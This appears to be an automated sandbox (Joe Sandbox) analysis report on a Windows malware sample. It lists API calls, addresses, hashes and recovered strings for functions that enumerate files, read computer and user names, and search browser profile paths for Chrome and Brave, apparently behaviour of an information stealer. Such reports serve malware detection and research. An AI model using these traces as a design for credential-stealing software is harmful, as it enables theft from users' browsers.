                                      • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007F18BC
                                      • Module32First.KERNEL32(00000000,00000224), ref: 007F18DC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7f0000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3833638111-0
                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction ID: beab58f8ffd57c9ecbc456aa3d6885c4a2956759e4f91814f39ceecec9a12217
                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction Fuzzy Hash: 4AF0C231100319ABE7203AF9998CABE72E8AF59775F500128E746925C0DA78EC054761
                                      APIs
                                      • SetErrorMode.KERNEL32(00000400,?,?,02300223,?,?), ref: 02300E19
                                      • SetErrorMode.KERNEL32(00000000,?,?,02300223,?,?), ref: 02300E1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction ID: 834bfec238e9a65a1cf45a95de28566e7cf1e366da0b19ee1e3b597b2ccced10
                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction Fuzzy Hash: 67D0123114512877D7002A94DC09BCD7B1CDF05B66F008011FB0DE9080C770954046E5
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                      • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                      • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                      • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                      APIs
                                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      • ExitProcess.KERNEL32 ref: 004011C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 1004333139-0
                                      • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                      • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                      • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                      • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 007F15A4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7f0000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction ID: 4f295318b131d6e19c46a8470bd501c4aec0f0b6d0c20dd9d78122e7ff40de4d
                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction Fuzzy Hash: B4113C79A00208EFDB01DF98C989E98BFF5AF08750F158094FA489B362D775EA50DF80
                                      APIs
                                      • wsprintfA.USER32 ref: 004138CC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-817767981
                                      • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                      • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                      • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                      • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                      • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-726946144
                                      • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                      • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                      • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                      • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                      APIs
                                      • wsprintfA.USER32 ref: 0041492C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • FindClose.KERNEL32(000000FF), ref: 00414B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                      • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                      • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                      • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                      APIs
                                      • wsprintfA.USER32 ref: 02313B33
                                      • FindFirstFileA.KERNEL32(?,?), ref: 02313B4A
                                      • lstrcat.KERNEL32(?,?), ref: 02313B9C
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 02313BAE
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 02313BC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 02313ECE
                                      • FindClose.KERNEL32(000000FF), ref: 02313EE3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID:
                                      • API String ID: 1125553467-0
                                      • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                      • Instruction ID: ea852241361964fc361492abfe5225a8c2d7d6889404f24635065da33cca8d63
                                      • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                      • Instruction Fuzzy Hash: DBA150B6A40218ABDB34DFA4DC84FEE737AFB49700F0445C9A50D96180EB759B84CF62
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                      • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                      • wsprintfA.USER32 ref: 004145A6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                      • FindClose.KERNEL32(000000FF), ref: 004146A0
                                      • lstrcatA.KERNEL32(?,00882620,?,00000104), ref: 004146C5
                                      • lstrcatA.KERNEL32(?,00880EC0), ref: 004146D8
                                      • lstrlenA.KERNEL32(?), ref: 004146E5
                                      • lstrlenA.KERNEL32(?), ref: 004146F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 13328894-2848263008
                                      • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                      • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                      • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                      • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                      APIs
                                      • wsprintfA.USER32 ref: 02314B93
                                      • FindFirstFileA.KERNEL32(?,?), ref: 02314BAA
                                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 02314BD8
                                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 02314BEE
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 02314DE4
                                      • FindClose.KERNEL32(000000FF), ref: 02314DF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                      • Instruction ID: 5dd3e5f43df826bd0bd500ccaa352ac3365fa0eae4036cf8197c7dbaa1eab6bc
                                      • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                      • Instruction Fuzzy Hash: 3C6178B5540218BBCB34EBE0DD84FEA73BDFB49701F00858DA64996180EB75A745CF91
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0230C15C
                                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 0230C1B4
                                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 0230C1CA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230CA26
                                      • FindClose.KERNEL32(000000FF), ref: 0230CA38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                      • Instruction ID: 6f8bf1a57c9a789ed43045d7dc866e5cea89a34ecd2575c697bd6bc3d68e37bf
                                      • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                      • Instruction Fuzzy Hash: 77423372A11108ABCB2CFBB0DDA5EED777AAF94301F40455DA50A961D0EF349B48CFA1
                                      APIs
                                      • wsprintfA.USER32 ref: 00413EC3
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                      • FindClose.KERNEL32(000000FF), ref: 00414081
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                      • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                      • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                      • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 023147E7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023147EE
                                      • wsprintfA.USER32 ref: 0231480D
                                      • FindFirstFileA.KERNEL32(?,?), ref: 02314824
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 02314852
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 02314868
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 023148F2
                                      • FindClose.KERNEL32(000000FF), ref: 02314907
                                      • lstrcat.KERNEL32(?,0064A524), ref: 0231492C
                                      • lstrcat.KERNEL32(?,0064A22C), ref: 0231493F
                                      • lstrlen.KERNEL32(?), ref: 0231494C
                                      • lstrlen.KERNEL32(?), ref: 0231495D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID:
                                      • API String ID: 671575355-0
                                      • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                      • Instruction ID: aaff60aec62ada5619ea0999a816107f38a9503b351cc3610ae4bcf5c005d175
                                      • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                      • Instruction Fuzzy Hash: 6D5175B5580218ABDB34EBB0DD89FEE737DEB58700F404588E64D92190EB759B84CFA1
                                      APIs
                                      • wsprintfA.USER32 ref: 0231412A
                                      • FindFirstFileA.KERNEL32(?,?), ref: 02314141
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0231416F
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 02314185
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 023142D3
                                      • FindClose.KERNEL32(000000FF), ref: 023142E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                      • Instruction ID: c746763b1d58c26e99ae7632f3ac38c60a217e7f69cf4d099f5b5bd120cabe26
                                      • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                      • Instruction Fuzzy Hash: B45173B5900218BBCB28FBF0DC84FEA737DBB44700F008598A64992080DB75E785CF95
                                      APIs
                                      • wsprintfA.USER32 ref: 0040ED3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                      • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                      • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                      • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                      • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                      • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                      • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: 4@$\*.*
                                      • API String ID: 2325840235-1993203227
                                      • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                      • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                      • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                      • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
